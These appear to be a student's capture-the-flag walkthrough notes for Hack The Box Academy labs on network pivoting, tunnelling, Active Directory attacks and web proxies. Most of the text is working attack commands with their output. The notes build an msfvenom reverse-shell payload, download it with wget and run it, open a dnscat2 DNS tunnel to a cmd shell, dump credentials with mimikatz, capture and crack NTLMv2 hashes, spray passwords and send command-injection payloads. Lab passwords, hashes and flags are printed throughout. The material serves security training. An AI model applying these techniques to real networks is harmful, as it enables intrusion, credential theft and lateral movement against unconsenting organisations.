SSH to $ip with user "ubuntu" and password "HTB_@cademy_stdnt!" Which IP address assigned to the Ubuntu server Pivot host allows communication with the Windows server target? (Format: x.x.x.x)
# Configure proxychains.
sudo nano /etc/proxychains4.conf
# Adding the last line: socks5 127.0.0.1 1234
# Set the dynamic port:
ssh ubuntu@$ip -D 1234
# Scan the NIC in the connection
ip a
Results: 172.16.5.129
What IP address is used on the attack host to ensure the handler is listening on all IP addresses assigned to the host? (Format: x.x.x.x)
Results: 0.0.0.0
What two IP addresses can be discovered when attempting a ping sweep from the Ubuntu pivot host? (Format: x.x.x.x,x.x.x.x)
# Configure proxychains.
sudo nano /etc/proxychains4.conf
# Adding the last line: socks5 127.0.0.1 1234
# Set the dynamic port:
ssh ubuntu@$ip -D 1234
# Scan the NIC in the connection
ip a
# Open a different terminal and run a nmap on the network range to discover ips (another network) from the victim's
proxychains nmap -v -sT -Pn 172.16.5.1-255
# In the results you will see 172.16.5.19. Now run a nmap on that ip
# Open ports:
# 53/tcp open domain
# 80/tcp open http
# 88/tcp open kerberos-sec
# 135/tcp open msrpc
# 139/tcp open netbios-ssn
# 389/tcp open ldap
# 445/tcp open microsoft-ds
# 464/tcp open kpasswd5
# 593/tcp open http-rpc-epmap
# 636/tcp open ldapssl
# 3268/tcp open globalcatLDAP
# 3269/tcp open globalcatLDAPssl
# 3389/tcp open ms-wbt-server
Results: 172.16.5.19,172.16.5.129
Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x)
Results: 172.16.5.0/255.255.254.0 via 10.129.202.64
Playing Pong with Socat
SSH tunneling is required with Socat. True or False?
Results: False
What Meterpreter payload did we use to catch the bind shell session? (Submit the full path as the answer)
Results: windows/x64/meterpreter/bind_tcp
Pivoting Around Obstacles
From which host will rpivot's server.py need to be run from? The Pivot Host or Attack Host? Submit Pivot Host or Attack Host as the answer.
Results: Attack Host
From which host will rpivot's client.py need to be run from? The Pivot Host or Attack Host. Submit Pivot Host or Attack Host as the answer.
Results: Pivot Host
SSH to $ip with user "ubuntu" and password "HTB_@cademy_stdnt!". Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the answer.
# Kali, terminal 1, copy the rpivot folder and run the server
scp -r rpivot ubuntu@$UbuntuIP:/home/ubuntu/
cd rpivot/
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
# Kali, terminal 2, connect to the ubuntu machine and run the rpivot client
ssh ubuntu@$ip
cd rpivot/
python2.7 client.py --server-ip $KaliIP --server-port 9999
# Kali, terminal 3, edit proxychains4.conf file and add the line ' sock4 127.0.0.1 9050' at the last line
sudo nano /etc/proxychains4.conf
# Kali, terminal 3, connect to the internal web server:
proxychains firefox-esr $ipWebServer
Results: I_L0v3_Pr0xy_Ch@ins
RDP to $ip with user "htb-student" and password "HTB_@cademy_stdnt!". Using the concepts covered in this section, take control of the DC (172.16.5.19) using xfreerdp by pivoting through the Windows 10 target host. Submit the approved contact's name found inside the "VendorContacts.txt" file located in the "Approved Vendors" folder on Victor's desktop (victor's credentials: victor:pass@123) . (Format: 1 space, not case-sensitive)
# From kali, terminal 1, connect to the windows machine
xfreerdp /u:"htb-student" /p:"HTB_@cademy_stdnt\!" /v:$ipWindows
# Run Powershell as Administrator and execute:
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=$IpInterface1Windows connectport=3389 connectaddress=$IpInterface2Windows
# Make sure the connection is saved
netsh.exe interface portproxy show v4tov4
# From kali, terminal 2, connect to the Target:
xfreerdp /u:victor /p:pass@123 /v:$IpInterface1Windows:8080
# Browse to the file and capture the flag
Results: Jim Flipflop
Branching Out Our Tunn
RDP to 10.129.42.198 (ACADEMY-PIVOTING-WIN10PIV) with user "htb-student" and password "HTB_@cademy_stdnt!". Using the concepts taught in this section, connect to the target and establish a DNS Tunnel that provides a shell session. Submit the contents of C:\Users\htb-student\Documents\flag.txt as the answer.
# In the kali attacker machine with ip $ip:
##################################
# Install the DNScat server
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
sudo gem install bundler
sudo bundle install
# Launch the server
sudo ruby dnscat2.rb --dns host=$ipAttackerMachine,port=53,domain=inlanefreight.local --no-cache
# See the response after launching the server. The dns server will generate a secret that we will use from the victim machine to connect
# Now, we need the client connection. As our targetted machine is Windows we download the powershell client dnscat2 to our kali
git clone https://github.com/lukebaggett/dnscat2-powershell.git
# Then, copy the dnscat2.ps1 file to the windows victim machine. For that use any of the file transfer techniques. In this case I initiated a http server from the folder where dnscat2.ps1 was
python -m http.server 8000
# Additionally, I opened a RDP connection with the windows machine:
xfreerdp /u:"htb-student" /p:"HTB_@cademy_stdnt\!" /v:$ip
###########################################
## From the windows machine. Open a powershell
################
# Download the dnscat2 powershell client:
curl http://$ipAttackerMachine:8000/dnscat2.ps1 > dnscat2.ps1
# Install
Import-Module .\dnscat2.ps1
# Initiate the connection
Start-Dnscat2 -DNSserver $ipAttackerMachine -Domain domain.local -PreSharedSecret $secret -Exec cmd
# $secret is obtained from the server launched in the kali machne.
###########################################
## From the kali Attacker machine
################
# We will receive the message:
# New window created: 1
# Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
# Enter the session
window -i 1
# Retrieve the flag
type C:\Users\htb-student\Documents\flag.txt
Results: AC@tinth3Tunnel
SSH to $ip with user "ubuntu" and password "HTB_@cademy_stdnt!" Using the concepts taught in this section, connect to the target and establish a SOCKS5 Tunnel that can be used to RDP into the domain controller (172.16.5.19, victor:pass@123). Submit the contents of C:\Users\victor\Documents\flag.txt as the answer.
#########
# In the attacker machine
#######
git clone https://github.com/jpillora/chisel.git
cd chisel
go build
# It can be helpful to be mindful of the size of the files we transfer onto targets on our client's networks, not just for performance reasons but also considering detection.
# You can run `go build -ldflags="-s -w"` and reduce it to 7.5MB (where `-s` is “Omit all symbol information from the output file” or strip, and `-w` is “Omit the DWARF symbol table”).
go build -ldflags="-s -w"
# Copy the file to the target
scp chisel ubuntu@$ip:~/
# And connect to the machine
ssh ubuntu@$ip
#########
# In the Ubuntu compromised machine, our Pivot Host
#######
./chisel server -v -p 1234 --socks5
sudo ./chisel server --reverse -v -p 1234 --socks5
SSH to $ip with user "ubuntu" and password "HTB_@cademy_stdnt!" Using the concepts taught in this section, connect to the target and establish a SOCKS5 Tunnel that can be used to RDP into the domain controller (172.16.5.19, victor:pass@123). Submit the contents of C:\Users\victor\Documents\flag.txt as the answer.
Results: Th3$eTunne1$@rent8oring!
Using the concepts taught thus far, connect to the target and establish an ICMP tunnel. Pivot to the DC (172.16.5.19, victor:pass@123) and submit the contents of C:\Users\victor\Downloads\flag.txt as the answer.
#########
# In the attacker machine
#######
git clone https://github.com/utoni/ptunnel-ng.git
# Once the ptunnel-ng repo is cloned to our attack host, we can run the autogen.sh script located at the root of the ptunnel-ng directory. Building Ptunnel-ng with Autogen.sh
sudo ./autogen.sh
# Another way to build the ptunnel-ng binary
sudo apt install automake autoconf -y
cd ptunnel-ng/
sed -i '$s/.*/LDFLAGS=-static "${NEW_WD}\/configure" --enable-static $@ \&\& make clean \&\& make -j${BUILDJOBS:-4} all/' autogen.sh
./autogen.sh
# After running autogen.sh, ptunnel-ng can be used from the client and server-side. We will now need to transfer the repo from our attack host to the target host
scp -r ptunnel-ng ubuntu@$ipUbuntuCompromisedMachine:~/
# Connect to the ubuntu
ssh ubuntu@$ipUbuntuCompromisedMachine
2. Start the ptunnel-ng Server on the Target Host
#########
# In the Ubuntu compromised machine, our Pivot Host
#######
sudo ./ptunnel-ng/src/ptunnel-ng -r$ipUbuntuCompromisedMachine -R22
3. With the ptunnel-ng ICMP tunnel successfully established, we can attempt to connect to the target using SSH through local port 2222 (-p2222).
#########
# In the attacker machine
#######
# Connecting to ptunnel-ng Server from Attack Host
sudo ./src/ptunnel-ng -p$ipUbuntuCompromisedMachine -l2222 -r$ipUbuntuCompromisedMachine -R22
Now we can use proxychains with RDP to connect to the machine in the other network range:
# First, enable Dynamic Port Forwarding over SSH
ssh -D 9050 -p2222 -lubuntu 127.0.0.1
# Now we can use proxychains with nmap
proxychains xfreerdp /u:$user /p:$password /v:172.16.5.19
Results: N3Tw0rkTunnelV1sion!
Double Pivots
RDP to $ip with user "htb-student" and password "HTB_@cademy_stdnt!" Use the concepts taught in this section to pivot to the Windows server at 172.16.6.155 (jason:WellConnected123!). Submit the contents of Flag.txt on Jason's Desktop.
Our goal will be reaching the attacked machine 3.
1. First, we download appropriate binaries to our kali attack host:
2. Attacking machine 1
Connect to the target using xfreerdp and transfer SocksOverRDPx64.zip to the Windows target machine. Once done, unzip it.
From the Windows machine 1, we will then need to load the SocksOverRDP.dll (located within the SocksOverRDP-x64 folder) using regsvr32.exe. Do it as Admin
3. Attacking machine 2
Now, from the machine 1, we can connect to machine 2 over RDP using mstsc.exe
. Windows-R and enter mstsc.exe. Enter the machine 2 IP 172.16.5.19, username and password. When doing so, we should receive a prompt that the SocksOverRDP plugin is enabled. And we will have access to the machine 2 from the RDP connection done from machine 1.
4. Attacking machine 3
Now we need to transfer SocksOverRDPx64.zip or just the SocksOverRDP-Server.exe to machine 2, 172.16.5.19. You can just try to copy paste it.
When done, start SocksOverRDP-Server.exe with Admin privileges in machine 2.
When we go back to our foothold target (machine 1) and check with Netstat, we should see our SOCKS listener started on 127.0.0.1:1080.
Also, we transfer from our kali machine to the machine 1, the proxifier portable. Once done we configure it in machine 1 to forward all our packets to 127.0.0.1:1080. Use SOCKS5 as protocol.
With Proxifier configured and running, we can start mstsc.exe, and it will use Proxifier to pivot all our traffic via 127.0.0.1:1080, which will tunnel it over RDP to 172.16.5.19, which will then route it to 172.16.6.155 using SocksOverRDP-server.exe.
So, now Windows-R and mstsc.exe to connect to machine 3 with username and password. If there are some problems with the connection, play in RDP program with the tab EXPERIENCE.
Results: H0pping@roundwithRDP!
Skill assessments
A team member started a Penetration Test against the Inlanefreight environment but was moved to another project at the last minute. Luckily for us, they left a web shell
in place for us to get back into the network so we can pick up where they left off. We need to leverage the web shell to continue enumerating the hosts, identifying common services, and using those services/protocols to pivot into the internal networks of Inlanefreight. Our detailed objectives are below
:
Objectives
- Start from external (
Pwnbox or your own VM
) and access the first system via the web shell left in place. - Use the web shell access to enumerate and pivot to an internal host.
- Continue enumeration and pivoting until you reach the
Inlanefreight Domain Controller
and capture the associatedflag
. - Use any
data
,credentials
,scripts
, or other information within the environment to enable your pivoting attempts. - Grab
any/all
flags that can be found.
Once on the webserver, enumerate the host for credentials that can be used to start a pivot or tunnel to another host in the network. In what user's directory can you find the credentials? Submit the name of the user as the answer.
# Enumerate $ip
sudo nmap $ip
# It will return port 80 and 22. Open a browser and go to http://$ip. It's a reverse shell.
cd /home
ls -la
# You will get two users. Have a look at webadmin.
ls -la /home/webadmin
# You will get a id_rsa file. Copy it to your kali machine and use it to connect again via ssh as webadmin
ssh -i id_rsa webadmin@$ip
Results: webadmin
Submit the credentials found in the user's home directory. (Format: user:password)
Results: mlefay:Plain Human work!
Enumerate the internal network and discover another active host. Submit the IP address of that host as the answer.
ip a
# Now we do a ping sweep
for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done
Results: 172.16.5.35
Use the information you gathered to pivot to the discovered host. Submit the contents of C:\Flag.txt as the answer.
###########
# I will use Module `Autoroute` in metasploit:
############
# Autoroute module allows you to set routes from a meterpreter session to a discovered subnet in the attacked machine. It allow us pivoting from one subnet to another.
# 1. Create a payload for the Ubuntu Pivot Host (our victim's machine 1):
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=$ipKali -f elf -o backupjob LPORT=8080
# 2. Kali machine. Different terminal. Start a multi/handler, also known as a Generic Payload Handler.
msfconsole -q
use exploit/multi/handler
set lhost 0.0.0.0
set lport 8080
set payload linux/x64/meterpreter/reverse_tcp
run
# 3. Once created, kali machine, serve it with a python http server
python3 -m http.server 8001
# 4. Connect to the Ubuntu with the id_rsa and download the file
ssh -i id_rsa webadmin@ipUbuntu
wget http://$ipKali:8001/backupjob
chmod +x backupjob
# 5. Ubuntu machine, execute the file to gain a Meterpreter session in your kali
./backupjob
# 6. Once the meterpreter Session is established, send the session to the background with CTRL-z and in the same terminal use Metasploit's post-exploitation routing module `socks_proxy` to configure a local proxy on our attack host.
use auxiliary/server/socks_proxy
set SRVPORT 9050
set SRVHOST
set version 4a
run
# This SOCKS configuration will start a listener on port 9050 and route all the traffic received via our Meterpreter session.
# Even though the command line has not returned anything you can ask for the jobs in execution with:
jobs
# Make sure that your /etc/proxychains4.conf in your kali has enabled the line
socks4 127.0.0.1 9050
# Note: Depending on the version the SOCKS server is running, we may occasionally need to changes socks4 to socks5 in proxychains.conf.
# 7. Finally, we need to tell our socks_proxy module to route all the traffic via our Meterpreter session. Use the post/multi/manage/autoroute module from Metasploit to add routes for the 172.16.5.0 subnet and then route all our proxychains traffic.
use post/multi/manage/autoroute
set SESSION 1
set SUBNET $NewSubnet
# Example: set SUBNET 172.16.5.0
run
# This will bind session 1 to the $NewSubnet discovered in the victim's machine 1, doing the pivoting
# It is also possible to add routes with autoroute by running autoroute from the initial Meterpreter session (session 1):
sessions -i 1
run autoroute -s $NewDiscoveredIp/16
# List the active routes:
run autoroute -p
# 8. Make sure that you will get back the communications with a reverse proxy:
ssh -i id_rsa $username@$ipUbuntuCompromisedmachine -R $ipUbuntuCompromisedmachine:8080:0.0.0.0:8000
# 9. Finally, use proxychains to route our RDP session traffic via our Meterpreter session.
proxychains xfreerdp /v:172.16.5.35 /u:mlefay /p:"Plain Human work\!"
Results: S1ngl3-Piv07-3@sy-Day
In previous pentests against Inlanefreight, we have seen that they have a bad habit of utilizing accounts with services in a way that exposes the users credentials and the network as a whole. What user is vulnerable?
# 1. Copy mimikatz to the Windows machine 1 with CTLR-C CTRL-V. Then in the Powershell terminal
.\mimikatz.exe privilege::debug sekurlsa::logonpasswords
# You will see user vfrank and password
vfrank:Imply wet Unmasked!
Results: vfrank
For your next hop enumerate the networks and then utilize a common remote access solution to pivot. Submit the C:\Flag.txt located on the workstation.
# 1. Open CMD and enumerate network interfaces
ipconfig /all
# 2. Notice a new network range: 172.16.6.35. Enumerate new Ips in that new network range
for /L %i in (1 1 254) do ping 172.16.6.%i -n 1 -w 100 | find "Reply"
# As a result now we have 172.16.6.25
# Note: I had problems with the Poweshell enumerator. For some reason this did not work for me:
1..254 | % {"172.16.6.$($_): $(Test-Connection -count 1 -comp 172.15.6.$($_) -quiet)"}
# 3. Windows-R and mstsc.exe. Enter 172.16.6.25 and use the creds vfrank:Imply wet Unmasked!
Results: N3tw0rk-H0pp1ng-f0R-FuN
Submit the contents of C:\Flag.txt located on the Domain Controller.
Results: 3nd-0xf-Th3-R@inbow!
Active Directory Enumeration & Attacks
Initial Enumeration
While looking at inlanefreights public records; A flag can be seen. Find the flag and submit it. ( format == HTB{} )
# Method 1
# Go to https://viewdns.info/
# Do a DNS Look up record for inlanefreight.com
# Method 2
dig TXT inlanefreight.com
Results: HTB{5Fz6UPNUFFzqjdg0AzXyxCjMZ}
SSH to with user "htb-student" and password "HTB_@cademy_stdnt!" From your scans, what is the "commonName" of host 172.16.5.5 ?
ssh htb-student@$ip
for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done
# On discovered host 172.16.5.5, run a nmap aggressive
nmap -A 172.16.5.5
Results: ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
What host is running "Microsoft SQL Server 2019 15.00.2000.00"? (IP address, not Resolved name)
# FRom previous sweep ping we also had this ip 172.16.5.130. We run a nmap to verify
nmap -A 172.16.5.130
Results: 172.16.5.130
Sniffing out a Foothold
Run Responder and obtain a hash for a user account that starts with the letter b. Submit the account name as your answer.
# One thing you can do is running kerbrute. For that previously in your kali machine
sudo responder -I ens224 -A -wf
Results: backupagent
Crack the hash for the previous account and submit the cleartext password as your answer.
echo "backupagent::INLANEFREIGHT:a44a64f117fef681:A2DD31752724815828DDEEA3CE0D14AF:0101000000000000007B3554C738DB0115079F6A10E61FB00000000002000800360047003900360001001E00570049004E002D0043005300500057005600580058004B0037003000360004003400570049004E002D0043005300500057005600580058004B003700300036002E0036004700390036002E004C004F00430041004C000300140036004700390036002E004C004F00430041004C000500140036004700390036002E004C004F00430041004C0007000800007B3554C738DB0106000400020000000800300030000000000000000000000000300000EDC155D127A35F887E8796110B67D2FFC726BEB6F6A090039BB1FB587FB8CC4E0A001000000000000000000000000000000000000900220063006900660073002F003100370032002E00310036002E0035002E003200320035000000000000000000" > hash2
hashcat -m 5600 hash2 /usr/share/wordlists/rockyou.txt
Results: h1backup55
Run Responder and obtain an NTLMv2 hash for the user wley. Crack the hash using Hashcat and submit the user's password as your answer.
sudo responder -I ens224 -A -wf
echo "wley::INLANEFREIGHT:59927891910ba43b:D0177CE077EDE96746E10975D2F34CAE:0101000000000000007B3554C738DB018AC0B8E5A51B55310000000002000800360047003900360001001E00570049004E002D0043005300500057005600580058004B0037003000360004003400570049004E002D0043005300500057005600580058004B003700300036002E0036004700390036002E004C004F00430041004C000300140036004700390036002E004C004F00430041004C000500140036004700390036002E004C004F00430041004C0007000800007B3554C738DB0106000400020000000800300030000000000000000000000000300000EDC155D127A35F887E8796110B67D2FFC726BEB6F6A090039BB1FB587FB8CC4E0A001000000000000000000000000000000000000900220063006900660073002F003100370032002E00310036002E0035002E003200320035000000000000000000" > hash3
hashcat -m 5600 hash3 /usr/share/wordlists/rockyou.txt
Results: transporter@4
RDP to $ip (ACADEMY-EA-MS01) with user "htb-student" and password "Academy_student_AD!" Run Inveigh and capture the NTLMv2 hash for the svc_qualys account. Crack and submit the cleartext password as the answer.
xfreerdp /v:$IP /u:htb-student /p:"Academy_student_AD\!" /cert:ignore
# Open Powershell as Administrator
cd c:/tools
.\Inveigh.exe
echo "svc_qualys::INLANEFREIGHT:c64015117cfae8cf:6E069821C26309BFF0ADA96F643AA703:0101000000000000007B3554C738DB0164C7AEAE827BFB2C0000000002000800360047003900360001001E00570049004E002D0043005300500057005600580058004B0037003000360004003400570049004E002D0043005300500057005600580058004B003700300036002E0036004700390036002E004C004F00430041004C000300140036004700390036002E004C004F00430041004C000500140036004700390036002E004C004F00430041004C0007000800007B3554C738DB0106000400020000000800300030000000000000000000000000300000EDC155D127A35F887E8796110B67D2FFC726BEB6F6A090039BB1FB587FB8CC4E0A001000000000000000000000000000000000000900220063006900660073002F003100370032002E00310036002E0035002E003200320035000000000000000000" > hashsvc
hashcat -m 5600 hashsvc /usr/share/wordlists/rockyou.txt
Results: security#1
Sighting In, Hunting For A User
SSH to $ip with user "htb-student" and password "HTB_@cademy_stdnt!" What is the default Minimum password length when a new domain is created? (One number)
Results: 7
What is the minPwdLength set to in the INLANEFREIGHT.LOCAL domain? (One number)
# Connect to the pivot machine
ssh htb-student@$ip
ip a
# Sweep ping to discover IPs in the new the network range 172.16.5.X
for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done
# rpcclient via the SMB NULL session technique:
rpcclient -U "" -N 172.16.5.5
# Now, within rpcclient terminal, enumerate domain password information
getdompwinfo
Results: 8
Enumerate valid usernames using Kerbrute and the wordlist located at /opt/jsmith.txt on the ATTACK01 host. How many valid usernames can we enumerate with just this wordlist from an unauthenticated standpoint?
sudo git clone https://github.com/ropnop/kerbrute.git
# Typing make help will show us the compiling options available.
cd kerbrute
make help
# type make all and compile one each for use on Linux, Windows, and Mac systems (an x86 and x64 version for each).
sudo make all
# The newly created dist directory will contain our compiled binaries.
ls -la dist
cd dist
python3 -m http.server 8001
# Connec to the pivot host
ssh htb-student@$ip
wget http://$ipAttacker:8001 kerbrute_linux_amd64
# Also download the jsmith.txt from https://github.com/insidetrust/statistically-likely-usernames/tree/master
# Run kerbrute from the pivot host
kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o valid_ad_users
Results: 56
Spray Responsibly
Find the user account starting with the letter "s" that has the password Welcome1. Submit the username as your answer.
./kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o valid_ad_users
./kerbrute_linux_386 passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_ad_users Welcome1
Results: sgage
RDP to $ip (ACADEMY-EA-MS01) with user "htb-student" and password "Academy_student_AD!". Using the examples shown in this section, find a user with the password Winter2022. Submit the username as the answer.
# Open powershell as Admin
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password Winter2022 -OutFile spray_success -ErrorAction SilentlyContinue
Results: dbranch
Deeper Down the Rabbit Hole
Question
Results:
Question
Results:
Question
Results:
Question
Results:
Question
Results:
Using Web Proxies
Intercepting Web Requests
Try intercepting the ping request on the server shown above, and change the post data similarly to what we did in this section. Change the command to read 'flag.txt'
# After intercepting the request, we enter:
POST /ping HTTP/1.1
Host: 94.237.59.24:51204
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 17
Origin: http://94.237.59.24:51204
Connection: close
Referer: http://94.237.59.24:51204/
Upgrade-Insecure-Requests: 1
ip=1;cat flag.txt
The response:
HTTP/1.1 200 OK
X-Powered-By: Express
Date: Sun, 20 Oct 2024 18:17:29 GMT
Connection: close
Content-Length: 282
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.030 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.030/0.030/0.030/0.000 ms
HTB{1n73rc3p73d_1n_7h3_m1ddl3}
Results: HTB{1n73rc3p73d_1n_7h3_m1ddl3}
Repeating Requests
Try using request repeating to be able to quickly test commands. With that, try looking for the other flag.
The request:
POST /ping HTTP/1.1
Host: 94.237.59.24:51204
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
Origin: http://94.237.59.24:51204
Connection: close
Referer: http://94.237.59.24:51204/
Upgrade-Insecure-Requests: 1
ip=1;cat /flag.txt
The response:
HTTP/1.1 200 OK
X-Powered-By: Express
Date: Sun, 20 Oct 2024 18:37:28 GMT
Connection: close
Content-Length: 283
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.034 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.034/0.034/0.034/0.000 ms
HTB{qu1ckly_r3p3471n6_r3qu3575}
Results: HTB{qu1ckly_r3p3471n6_r3qu3575}
Encoding/Decoding
Question.
# The provided file contains the text:
VTJ4U1VrNUZjRlZXVkVKTFZrWkdOVk5zVW10aFZYQlZWRmh3UzFaR2NITlRiRkphWld0d1ZWUllaRXRXUm10M1UyeFNUbVZGY0ZWWGJYaExWa1V3ZVZOc1VsZGlWWEJWVjIxNFMxWkZNVFJUYkZKaFlrVndWVmR0YUV0V1JUQjNVMnhTYTJGM1BUMD0=
# It is base64 text. You need to decode in base64 4 times until getting an url encoded. First:
cat encoded_flag.txt | base64 -d | tee encoded2.txt
# U2xSUk5FcFVWVEJLVkZGNVNsUmthVXBVVFhwS1ZGcHNTbFJaZWtwVVRYZEtWRmt3U2xSTmVFcFVXbXhLVkUweVNsUldiVXBVV214S1ZFMTRTbFJhYkVwVVdtaEtWRTB3U2xSa2F3PT0=
cat encoded2.txt | base64 -d | tee encoded3.txt
# SlRRNEpUVTBKVFF5SlRkaUpUTXpKVFpsSlRZekpUTXdKVFkwSlRNeEpUWmxKVE0ySlRWbUpUWmxKVE14SlRabEpUWmhKVE0wSlRkaw==
cat encoded3.txt | base64 -d | tee encoded4.txt
# JTQ4JTU0JTQyJTdiJTMzJTZlJTYzJTMwJTY0JTMxJTZlJTM2JTVmJTZlJTMxJTZlJTZhJTM0JTdk
cat encoded4.txt | base64 -d | tee encoded5.txt
# %48%54%42%7b%33%6e%63%30%64%31%6e%36%5f%6e%31%6e%6a%34%7d
# Enter it in Decoder in Burpsuite
HTB{3nc0d1n6_n1nj4}
Results: HTB{3nc0d1n6_n1nj4}
Proxying Tools
Question.
# Start metasploit
msfconsole -q
# Then, to set a proxy for any exploit within Metasploitwith the `set PROXIES` flag.
set PROXIES HTTP:127.0.0.1:8080
use auxiliary/scanner/http/http_put
set RHOSTS https://academy.hackthebox.com/
run
Results: msf test file
Burp Intruder
Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag.
This is the request
GET /admin/§flag§.html HTTP/1.1
Host: 94.237.59.246:39867
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
In Burp Intruder set a Snipper attack. Use common.txt as payload. Run it and payload 2010 will return the flag.
Results: HTB{burp_1n7rud3r_fuzz3r!}
ZAP Fuzzer
The directory we found above sets the cookie to the md5 hash of the username, as we can see the md5 cookie in the request for the (guest) user. Visit '/skills/' to get a request with a cookie, then try to use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag. Use the "top-usernames-shortlist.txt" wordlist from Seclists.
Results: HTB{fuzz1n6_my_f1r57_c00k13}
ZAP Scanner
Run ZAP Scanner on the target above to identify directories and potential vulnerabilities. Once you find the high-level vulnerability, try to use it to read the flag at '/flag.txt'.
The vulnerable endpoint contains a command injection vulnerability. This is the request:
GET /devtools/ping.php?ip=|+cat+/flag.txt HTTP/1.1
Host: 94.237.54.253:52356
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://94.237.54.253:52356/index.php/2021/08/11/customer-support/
Upgrade-Insecure-Requests: 1
And this is the response:
HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 16:54:31 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 156
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Ping</title>
</head>
<body>
HTB{5c4nn3r5_f1nd_vuln5_w3_m155}
</body>
</html>
Results: HTB{5c4nn3r5_f1nd_vuln5_w3_m155}
Skills Assessment - Using Web Proxies
The /lucky.php page has a button that appears to be disabled. Try to enable the button, and then click it to get the flag..
# Intercept traffic qith Burpsuite. Go to the website http://$ip:$port/lucky.php and remove in source code "disabled=""". Then click on the button. You will get a POST request to lucky.php in your intercepted traffic. Send it to Repeater module. Click on Send. Within the response, you will see:
<p style="text-align:center">HTB{d154bl3d_bu770n5_w0n7_570p_m3}</p>
Results: HTB{d154bl3d_bu770n5_w0n7_570p_m3}
The /admin.php page uses a cookie that has been encoded multiple times. Try to decode the cookie until you get a value with 31-characters. Submit the value as the answer..
# Intercept traffic qith Burpsuite. Go to the website http://$ip:$port/admin.php. See the "Set-Cookie: cookie=4d325268597a6b7a596a686a5a4449314d4746684f474d7859544d325a6d5a6d597a63355954453359513d3d"
# Use Decoder. First, decode as ASCII hex, you will get:
M2RhYzkzYjhjZDI1MGFhOGMxYTM2ZmZmYzc5YTE3YQ==
# Use Decoder. Second, decode as Base64, you will get:
3dac93b8cd250aa8c1a36fffc79a17a
Results: 3dac93b8cd250aa8c1a36fffc79a17a
Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload).
Results: HTB{burp_1n7rud3r_n1nj4!}
You are using the 'auxiliary/scanner/http/coldfusion_locale_traversal' tool within Metasploit, but it is not working properly for you. You decide to capture the request sent by Metasploit so you can manually verify it and repeat it. Once you capture the request, what is the 'XXXXX' directory being called in '/XXXXX/administrator/..'?.
msfconsole -q
use auxiliary/scanner/http/coldfusion_locale_traversal
options
set RHOSTS $ip
set RPORT $port
set PROXIES HTTP:127.0.0.1:8080
# Go to Burpsuite and check out the request
GET /CFIDE/administrator/index.cfm HTTP/1.1
Host: 94.237.62.154:37883
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Connection: close
Results: CFIDE
Attacking Web Applications with Ffuf
Basic Fuzzing
Directory fuzzing
In addition to the directory we found above, there is another directory that can be found. What is it?
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://$ip:$port/FUZZ
Results: forum
Page fuzzing
Try to use what you learned in this section to fuzz the '/blog' directory and find all pages. One of them should contain a flag. What is the flag?.
# Find the extension in use
ffuf -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://$ip:$port/blog/indexFUZZ
# As it is php, we will fuzz now possible existent files.php
